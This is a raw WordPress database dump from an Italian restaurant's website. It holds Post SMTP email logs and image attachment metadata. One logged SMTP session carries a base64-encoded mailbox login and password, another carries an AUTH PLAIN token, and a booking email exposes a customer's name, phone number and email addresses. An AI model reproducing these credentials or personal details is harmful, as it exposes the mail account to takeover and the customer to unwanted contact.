(https://wordpress.org/plugins/post-smtp/)\r\nX-WPCF7-Content-Type: text/plain\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Salomoni Massimo <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: teosphone@gmail.com\r\nReply-To: salomonimassimo@gmail.com\r\nMessage-Id: <c32b5c8f068765a1a6fd754e17e48622@ristorantesolymar.it>\r\nSubject: Da sito Sol Y Mar: \"prenotazione\"\r\nDate: Mon, 26 Oct 2020 16:06:00 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nDa: Salomoni Massimo <salomonimassimo@gmail.com>=0ATelefono: 3383339984=\r\n=0AOggetto: prenotazione=0A=0ACorpo del messaggio:=0ABuonasera =0D=0Avor=\r\nrei prenotare un tavolo per due persone a pranzo domenica 01/11 alle ore=\r\n 13 =0D=0Apreferibilmente vista mare..=0D=0ADistinti Saluti=0D=0AMassimo=\r\n=0A=0AAccettato=0A=0A--=0AQuesta e-mail =C3=A8 stata inviata da un modul=\r\no di contatto su Sol Y Mar (https://www.ristorantesolymar.it)\r\n.\r\n250 OK id=1kX50S-0001IY-BA\r\n'),(22149,1171,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(22150,1171,'success',''),(22151,1171,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(22152,1171,'to_header','webmaster@baldisserri.com'),(22153,1171,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(22154,1171,'original_to','webmaster@baldisserri.com'),(22155,1171,'original_subject','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated'),(22156,1171,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Yoast SEO version 15.2\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(22157,1171,'original_headers',''),(22158,1171,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Tue, 27 Oct 2020 08:32:15 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n535 Incorrect authentication data\r\n'),(22159,1173,'solution','Not found, check status column for more info.'),(22160,1173,'success','1'),(22161,1173,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(22162,1173,'to_header','webmaster@baldisserri.com'),(22163,1173,'transport_uri','smtps:login://mail.ristorantesolymar.it:465'),(22164,1173,'original_to','webmaster@baldisserri.com'),(22165,1173,'original_subject','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated'),(22166,1173,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Yoast SEO version 15.2\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(22167,1173,'original_headers',''),(22168,1173,'session_transcript','smtps:login://mail.ristorantesolymar.it:465\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Tue, 27 Oct 2020 08:32:17 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [173.214.189.150]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH LOGIN\r\n334 VXNlcm5hbWU6\r\nbm90aWZpY2hlQHJpc3RvcmFudGVzb2x5bWFyLml0\r\n334 UGFzc3dvcmQ6\r\nU29seW1hcjIwMjA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <7b0e85449061f2ccfa67131f5e89f7fe@ristorantesolymar.it>\r\nSubject: [Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated\r\nDate: Tue, 27 Oct 2020 12:32:17 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nHowdy! Some plugins have automatically updated to their latest versions=\r\n on your site at https://www.ristorantesolymar.it. No further action is=\r\n needed on your part.=0A=0A=0AThese plugins are now up to date:=0A- Yoas=\r\nt SEO version 15.2=0A=0A=0AIf you experience any issues or need support,=\r\n the volunteers in the WordPress.org support forums may be able to help.=\r\n=0Ahttps://wordpress.org/support/forums/=0A=0AThe WordPress Team\r\n.\r\n250 OK id=1kXO9B-0004mC-T3\r\n'),(22169,1174,'_wp_attached_file','2020/10/solymar-giugno2020-0076-1.jpg'),(22170,1174,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:853;s:4:\"file\";s:37:\"2020/10/solymar-giugno2020-0076-1.jpg\";s:5:\"sizes\";a:15:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:37:\"solymar-giugno2020-0076-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0076-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0076-1-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0076-1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:38:\"solymar-giugno2020-0076-1-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0076-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0076-1-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-large-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0076-1-830x553.jpg\";s:5:\"width\";i:830;s:6:\"height\";i:553;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"sydney-medium-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0076-1-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0076-1-230x153.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:153;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0076-1-350x233.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:233;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"sydney-mas-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0076-1-480x320.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:37:\"solymar-giugno2020-0076-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0076-1-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0076-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"6.3\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"ILCE-7M3\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1592997027\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"70\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:7:\"0.00625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(22171,1176,'_wp_attached_file','2020/10/solymar-giugno2020-0139.jpg'),(22172,1176,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:853;s:4:\"file\";s:35:\"2020/10/solymar-giugno2020-0139.jpg\";s:5:\"sizes\";a:15:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:35:\"solymar-giugno2020-0139-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0139-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0139-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0139-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:36:\"solymar-giugno2020-0139-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0139-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0139-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-large-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0139-830x553.jpg\";s:5:\"width\";i:830;s:6:\"height\";i:553;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"sydney-medium-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0139-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0139-230x153.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:153;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0139-350x233.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:233;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"sydney-mas-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0139-480x320.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:35:\"solymar-giugno2020-0139-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0139-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0139-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"ILCE-7M3\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1593002866\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"70\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:5:\"0.002\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(22173,1177,'_wp_attached_file','2020/10/solymar-giugno2020-0126.jpg'),(22174,1177,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:853;s:4:\"file\";s:35:\"2020/10/solymar-giugno2020-0126.jpg\";s:5:\"sizes\";a:15:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:35:\"solymar-giugno2020-0126-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0126-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0126-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0126-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:36:\"solymar-giugno2020-0126-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0126-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0126-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-large-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0126-830x553.jpg\";s:5:\"width\";i:830;s:6:\"height\";i:553;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"sydney-medium-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0126-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0126-230x153.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:153;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0126-350x233.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:233;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"sydney-mas-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0126-480x320.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:35:\"solymar-giugno2020-0126-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0126-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0126-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"ILCE-7M3\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1593001259\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"37\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:5:\"0.005\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(22175,1178,'_wp_attached_file','2020/10/solymar-giugno2020-0101-1.jpg'),(22176,1178,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:853;s:4:\"file\";s:37:\"2020/10/solymar-giugno2020-0101-1.jpg\";s:5:\"sizes\";a:15:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:37:\"solymar-giugno2020-0101-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0101-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0101-1-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0101-1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:38:\"solymar-giugno2020-0101-1-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0101-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0101-1-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-large-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0101-1-830x553.jpg\";s:5:\"width\";i:830;s:6:\"height\";i:553;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"sydney-medium-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0101-1-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0101-1-230x153.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:153;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0101-1-350x233.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:233;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"sydney-mas-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0101-1-480x320.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:37:\"solymar-giugno2020-0101-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0101-1-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0101-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"ILCE-7M3\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1592999998\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"25\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:5:\"0.008\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(22177,1179,'_wp_attached_file','2020/10/solymar-giugno2020-0100-1.jpg'),(22178,1179,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:853;s:4:\"file\";s:37:\"2020/10/solymar-giugno2020-0100-1.jpg\";s:5:\"sizes\";a:15:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:37:\"solymar-giugno2020-0100-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0100-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0100-1-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0100-1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:38:\"solymar-giugno2020-0100-1-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0100-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0100-1-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-large-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0100-1-830x553.jpg\";s:5:\"width\";i:830;s:6:\"height\";i:553;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"sydney-medium-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0100-1-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0100-1-230x153.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:153;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0100-1-350x233.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:233;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"sydney-mas-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0100-1-480x320.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:37:\"solymar-giugno2020-0100-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0100-1-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0100-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"ILCE-7M3\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1592999978\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"70\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:5:\"0.008\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(22179,1180,'_wp_attached_file','2020/10/solymar-giugno2020-0095-1.jpg'),(22180,1180,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:853;s:4:\"file\";s:37:\"2020/10/solymar-giugno2020-0095-1.jpg\";s:5:\"sizes\";a:15:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:37:\"solymar-giugno2020-0095-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0095-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0095-1-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0095-1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:38:\"solymar-giugno2020-0095-1-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0095-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0095-1-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-large-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0095-1-830x553.jpg\";s:5:\"width\";i:830;s:6:\"height\";i:553;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"sydney-medium-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0095-1-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0095-1-230x153.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:153;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0095-1-350x